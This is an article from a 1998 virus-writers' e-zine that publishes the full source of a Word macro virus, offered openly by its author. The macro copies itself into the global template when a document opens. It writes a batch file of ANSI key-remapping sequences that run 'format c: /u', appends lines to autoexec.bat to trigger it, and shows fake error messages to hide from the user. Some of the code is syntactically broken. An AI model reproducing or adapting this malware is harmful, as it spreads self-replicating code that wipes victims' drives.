ฤฤฤฤฤฤฤ[PVW4.023]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #4
DATE : December 1998
                                % % % % %

                               - = %|% = -

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

  213 Macro Virus
  By : Lorz

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
This is a Macro virus by LORZ w/c will create a an ANSI bomb.
Call it 213 Macro virus. I think this is the first kind of macro virus
that will be an ansi-bomb.It will first make an ANSI bomb named 
exec.bat. Then will load ansi.sys and 
run the file. It will also give error messages to minimize detection.

Sub AutoOpen 
On Error Goto Errorhandler
Fname$ = FileName$()
MacName$ = Fname$ + ":AutoOpen"

MacroCopy MacName$, "Global:ToolsMacro"
MacroCopy MacName$, "Global:ViewVBCode"
MacroCopy MacName$, "Global:Lorz"
Errorhandler:
If IsDocumentDirty() = - 1 Then
MacroCopy "Global:AutoOpen", MacName$
MacroCopy "Global:Lorz", MacName$
MacroCopy "Global:ToolsMacro", MacName$
MacroCopy "Global:ViewVBCode", MacName$
End If
FileSaveAs .Format = 1
End Sub

Sub Lorz()
   On Error GoTo Puta

   Open "c:\exec.bat" For Output As #1
   Print #1, "@ECHO ON"
   Print #1, "[33;"format c: /u";13p"
   Print #1, "[34;"format c: /u";13p"
   Print #1, "[35;"format c: /u";13p"
   Print #1, "[36;"format c: /u";13p"
   Print #1, "[37;"format c: /u";13p"
   Print #1, "[38;"format c: /u";13p"
   Print #1, "[39;"format c: /u";13p"
   Print #1, "[40;"format c: /u";13p"
   Print #1, "[76;"format c: /u";13p"
   Print #1, "[79;"format c: /u";13p"
   Print #1, "[82;"format c: /u";13p"
   Print #1, "[90;"format c: /u";13p"
   Print #1, "[108;"format c: /u";13p"
   Print #1, "[111;"format c: /u";13p"
   Print #1, "[114;"format c: /u";13p"
   Print #1, "[122;"format c: /u";13p"
   Close #1
 
   On Error GoTo Puta
   Open "c:\autoexec.bat" For Append As #2  
   Print #2, "DEVICE=C:\WINDOWS\COMMAND\ANSI.SYS"
   Print #2, "Run c:\windows\exec.bat"
   Close #2

Puta:
End Sub()

Sub ToolsMacro()
Msgbox "0C25.dll not found",0,"ERROR"
End Sub

Sub ViewVBCode()
Msgbox "0C25.dll not found",0,"ERROR"
End Sub

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
(C) Pinoy Virus Writers 1998
Lorz213@mailcity.com
